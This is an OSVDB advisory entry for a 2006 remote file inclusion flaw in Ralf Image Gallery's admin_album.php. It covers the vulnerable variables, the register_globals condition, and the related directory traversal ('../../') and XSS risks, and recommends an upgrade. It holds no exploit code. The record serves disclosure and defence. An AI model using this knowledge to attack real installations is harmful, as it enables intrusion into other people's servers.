Ralf Image Gallery admin_album.php Multiple Variable Remote File Inclusion

2006-06-20T11:19:03
ID OSVDB:26754
Type osvdb
Reporter David "Aesthetico" Vieira-Kurz(admin@majorsecurity.de)
Modified 2006-06-20T11:19:03

Description

Vulnerability Description

Ralf Image Gallery (R.I.G.) contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to the admin_album.php script not properly sanitizing user input supplied to the 'dir_abs_src' or 'dir_abs_admin_src' variables. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.

Additionally, this can be used to access arbitrary files via directory traversal style attacks (../../), or conduct cross-site scripting (XSS) attacks allowing for the execution of arbitrary code in a user's browser within the trust relationship between the browser and the server.

Technical Description

This vulnerability is only present when the register_globals PHP option is set to 'on'. This has not been the default setting for PHP installs since version 4.2.0 (22-Apr-2002).

Solution Description

Upgrade to version 1.0 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

Short Description

Ralf Image Gallery (R.I.G.) contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to the admin_album.php script not properly sanitizing user input supplied to the 'dir_abs_src' or 'dir_abs_admin_src' variables. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.

Additionally, this can be used to access arbitrary files via directory traversal style attacks (../../), or conduct cross-site scripting (XSS) attacks allowing for the execution of arbitrary code in a user's browser within the trust relationship between the browser and the server.

References:

Vendor URL: http://rig.powerpulsar.com/ Secunia Advisory ID:20771 Related OSVDB ID: 26753 Related OSVDB ID: 26755 Related OSVDB ID: 26756 Other Advisory URL: http://www.majorsecurity.de/advisory/major_rls18.txt Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-06/0609.html Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-06/0430.html Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-06/0577.html Keyword: MajorSecurity #18 FrSIRT Advisory: ADV-2006-2477 CVE-2006-3210